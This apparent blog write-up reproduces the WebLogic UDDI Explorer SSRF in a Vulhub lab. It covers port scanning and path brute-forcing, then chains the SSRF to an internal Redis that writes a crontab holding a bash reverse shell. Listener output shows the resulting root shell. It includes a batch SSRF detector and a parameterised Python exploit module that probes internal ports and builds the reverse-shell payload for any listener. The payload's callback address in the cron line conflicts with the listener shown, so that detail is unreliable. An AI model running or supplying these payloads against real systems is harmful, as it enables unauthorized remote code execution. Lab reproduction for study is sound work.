Vulhub WebLogic SSRF vulnerability reproduction

For the environment setup and background, see Vulhub.

Pretending I was just browsing around, I stumbled on http://10.20.7.7.
First, a full port scan with my latest toy, netcat:

root@Sanqiushu:~# nc -z -n -v 10.20.7.7 1-65535
(UNKNOWN) [10.20.7.7] 7001 (afs3-callback) open
(UNKNOWN) [10.20.7.7] 4444 (?) : Connection timed out
(UNKNOWN) [10.20.7.7] 22 (ssh) open
----------
Grab the banners:
root@Sanqiushu:~# echo "" | nc -n -v 10.20.7.7 1-65535
(UNKNOWN) [10.20.7.7] 7001 (afs3-callback) open
(UNKNOWN) [10.20.7.7] 4444 (?) : Connection timed out
(UNKNOWN) [10.20.7.7] 22 (ssh) open
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
Protocol mismatch.
------------
Compare with nmap (the port nc timed out on, 4444, is what nmap reports as filtered):
root@Sanqiushu:~# nmap  10.20.7.7 -p 1-65535
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-15 15:09 CST
Nmap scan report for 10.20.7.7
Host is up (0.000077s latency).
Not shown: 65532 closed ports
PORT     STATE    SERVICE
22/tcp   open     ssh
4444/tcp filtered krb524
7001/tcp open     afs3-callback
MAC Address: 08:00:27:F1:8C:A9 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 18.55 seconds

Port 7001 is open, so open it in a browser.

Nothing obvious, so brute-force the paths:

PS F:\SecTools\apps\dirsearch-master\dirsearch-master> ./dirsearch.py -u http://10.20.7.7:7001/ -e jsp

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: jsp | HTTP method: get | Threads: 10 | Wordlist size: 6074

Error Log: F:\SecTools\apps\dirsearch-master\dirsearch-master\logs\errors-19-08-15_15-00-35.log

Target: http://10.20.7.7:7001/

[15:00:35] Starting:
[15:00:41] 302 -  273B  - /bea_wls_internal  ->  http://10.20.7.7:7001/bea_wls_internal/
[15:00:41] 200 -    0B  - /bea_wls_internal/HTTPClntRecv
[15:00:41] 500 -    2KB - /beanManaged
[15:00:41] 500 -    2KB - /bea_wls_internal/HTTPClntSend
[15:00:41] 500 -    2KB - /bea_wls_internal/iiop/ClientClose
[15:00:41] 500 -    2KB - /bea_wls_internal/iiop/ClientLogin
[15:00:41] 200 -    0B  - /bea_wls_internal/iiop/ClientRecv
[15:00:41] 500 -    2KB - /Bigdump.jsp
[15:00:41] 500 -    2KB - /bea_wls_internal/iiop/ClientSend
[15:00:42] 200 -  416B  - /console
[15:00:42] 200 -  418B  - /console/
[15:00:42] 200 -  435B  - /console/base/config.json
[15:00:42] 200 -  440B  - /console/payments/config.json
[15:00:42] 200 -  437B  - /console/j_security_check
[15:00:54] 302 -  265B  - /uddiexplorer  ->  http://10.20.7.7:7001/uddiexplorer/
[15:00:54] 302 -  249B  - /uddi  ->  http://10.20.7.7:7001/uddi/
[15:00:55] 200 -  855B  - /uddi/uddilistener

Task Completed
PS F:\SecTools\apps\dirsearch-master\dirsearch-master>

Plenty of paths; let's look at them.

There is a UDDI Explorer.
This vulnerability (CVE-2014-4210) affects WebLogic 10.0.2 through 10.3.6, and the version isn't visible here, which is annoying.
So just test it directly.

Search for anything.

Intercept the request in Burp and send it to Repeater.

Change the operator parameter here to a test address.

The server returns a 404, good: the request was actually made on our behalf.
Next, probe the internal services.
The script is from https://www.jianshu.com/p/97b157a20108 (I haven't tried it). Note that as written it is a batch detector: for each host in domain.txt it reads the example registry URL from SetupUDDIExplorer.jsp, feeds that URL back in as the operator parameter, and reports the host as vulnerable if the reply contains the UDDI client's XML_SoapException, which shows the server issued the request itself.
Copied over (Python 3):

import re
import queue
import threading

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

task_queue = queue.Queue()
mutex = threading.Lock()


class Test(threading.Thread):
    def __init__(self, task_queue):
        threading.Thread.__init__(self)
        self.queue = task_queue

    def check(self, domain, ip):
        # Make the target fetch its own registry URL through the operator
        # parameter; an XML_SoapException in the reply means the server
        # performed the request itself, i.e. the SSRF is present.
        payload = ("uddiexplorer/SearchPublicRegistries.jsp?operator={ip}&rdoSearch=name"
                   "&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location"
                   "&btnSubmit=Search").format(ip=ip)
        url = domain + payload
        try:
            html = requests.get(url=url, timeout=15, verify=False).text
            m = re.search('weblogic.uddi.client.structures.exception.XML_SoapException', html)
            if m:
                with mutex:
                    with open('ssrf1.txt', 'a+') as f:
                        print("%s has weblogic ssrf." % domain)
                        f.write("%s has weblogic ssrf.\n" % domain)
        except Exception as e:
            print(e)

    def get_registry(self, domain):
        # The setup page prints an example registry URL of the form
        # "For example: http://host:7001/uddi/uddilistener"; keep scheme://host:port.
        payload = 'uddiexplorer/SetupUDDIExplorer.jsp'
        url = domain + payload
        try:
            html = requests.get(url=url, timeout=15, verify=False).text
            m = re.search('<i>For example: (.*?)/uddi/uddilistener.*?</i>', html)
            if m:
                return m.group(1)
        except Exception as e:
            print(e)
        return None

    def run(self):
        while not self.queue.empty():
            domain = self.queue.get()
            with mutex:
                print(domain)
            ip = self.get_registry(domain)
            if ip:  # no UDDI Explorer setup page, nothing to test
                self.check(domain, ip)
            self.queue.task_done()


if __name__ == '__main__':
    with open('domain.txt', 'r') as f:
        lines = f.readlines()
    for line in lines:
        domain = line.strip()
        if domain:
            # The paths above are relative, so every entry needs a trailing slash.
            task_queue.put(domain.rstrip('/') + '/')
    for x in range(1, 50):
        t = Test(task_queue)
        t.daemon = True
        t.start()
    task_queue.join()

This turned up a service on port 6379 (how do we know what it is? 6379 is the default Redis port).

Just fire the Redis payload at it through the SSRF.



After a short wait the listening machine receives the connection (the cron entry fires once a minute, so it can take up to a minute):

root@Sanqiushu:~# nc -lvp 4444
listening on [any] 4444 ...
10.20.7.7: inverse host lookup failed: Unknown host
connect to [10.20.2.185] from (UNKNOWN) [10.20.7.7] 45976
bash: no job control in this shell
[root@31607ec8723e ~]# ls
ls
anaconda-ks.cfg
install.log
install.log.syslog
[root@31607ec8723e ~]# ls
ls
anaconda-ks.cfg
install.log
install.log.syslog
[root@31607ec8723e ~]# 

The payload originally looks like this. Redis reads the HTTP request that WebLogic sends line by line and ignores the lines it does not understand, so only the set, config set and save lines take effect, and the result is a dump file written to /etc/crontab that contains the cron line with the reverse shell:

test

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/10.20.7.7/4444 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

aaa

It was URL-encoded when sent; with POST that seems unnecessary.
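The internal port probing from earlier and the Redis payload above, driven from Python 3. This is an added example, not code from the original post, the jianshu script or Vulhub. It assumes the form fields of the post's own request; the error strings in classify() are an assumption about how the UDDI client reports a refused connection versus a non-SOAP reply and should be confirmed against a known-open and a known-closed port first; the fetch callable is injected so the logic runs offline; and the addresses under __main__ are placeholders.

```python
"""Drive the WebLogic UDDI Explorer SSRF from Python 3 (added example).

Assumptions not stated by the post: the error strings in classify() and the
sample addresses under __main__; the form fields match the request in the post.
"""
import urllib.error
import urllib.request
from urllib.parse import urlencode

SSRF_PATH = "/uddiexplorer/SearchPublicRegistries.jsp"


def build_ssrf_url(base, operator):
    """URL that makes the WebLogic host at `base` fetch `operator` for us.

    urlencode() is the single layer of URL encoding the post mentions: the
    servlet decodes the operator parameter once, so newlines and other bytes
    reach the internal host raw inside the request line."""
    params = {
        "rdoSearch": "name",
        "btnSubmit": "Search",
        "txtSearchname": "sdf",
        "txtSearchkey": "",
        "txtSearchfor": "",
        "selfor": "Business location",
        "operator": operator,  # the SSRF sink
    }
    return base.rstrip("/") + SSRF_PATH + "?" + urlencode(params)


def classify(body):
    """Map the error WebLogic reports back to the state of the probed port.

    The strings are assumptions about the UDDI client's error messages;
    confirm them against a known-open and a known-closed port first."""
    if "could not connect over HTTP to server" in body:
        return "closed"       # TCP connect failed
    if "did not have a valid SOAP content-type" in body:
        return "open-http"    # an HTTP server answered (e.g. 7001)
    if "XML_SoapException" in body:
        return "open"         # something answered, but not HTTP (e.g. Redis)
    return "unknown"


def probe(base, host, ports, fetch):
    """Probe host:port pairs through the SSRF; fetch(url) returns the body
    text and is injected so the logic can be tested without a live target."""
    return {
        port: classify(fetch(build_ssrf_url(base, f"http://{host}:{port}")))
        for port in ports
    }


def redis_cron_payload(attacker_ip, attacker_port):
    """The post's Redis payload, parameterised on the listener address.

    Redis reads the HTTP request WebLogic sends one line at a time and skips
    lines it does not understand: the request line (ending in "/test"), the
    blank lines and the headers are harmless, and "aaa" soaks up the trailing
    " HTTP/1.1" so `save` stays intact. The literal \\n escapes inside the
    double-quoted value become newlines when Redis parses the string, which
    keeps the cron line on a line of its own between the RDB binary data."""
    cron = f"* * * * * root bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1"
    return "\n".join([
        "test",
        "",
        f'set 1 "\\n\\n\\n\\n{cron}\\n\\n\\n\\n"',
        "config set dir /etc/",
        "config set dbfilename crontab",
        "save",
        "",
        "aaa",
    ])


def redis_exploit_url(base, redis_host, attacker_ip, attacker_port, redis_port=6379):
    """Full SSRF URL that delivers the crontab payload to the internal Redis."""
    operator = f"http://{redis_host}:{redis_port}/" + redis_cron_payload(attacker_ip, attacker_port)
    return build_ssrf_url(base, operator)


def http_fetch(url, timeout=15):
    """Default fetcher for live use; the error page may come back as a non-2xx."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", "replace")


if __name__ == "__main__":
    # Placeholder addresses: the WebLogic host from the post, an assumed
    # internal Redis IP, and the attacker's listener (must be reachable
    # from the Redis container, not the WebLogic host's own address).
    base = "http://10.20.7.7:7001"
    print(probe(base, "172.18.0.2", [7000, 7001, 6379], http_fetch))
    print(redis_exploit_url(base, "172.18.0.2", "10.20.2.185", 4444))
```

The callback host in the cron line has to be the address the Redis container can reach where nc -lvp is actually listening; the probe step is the quickest way to learn which internal addresses the WebLogic host can see before choosing it.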
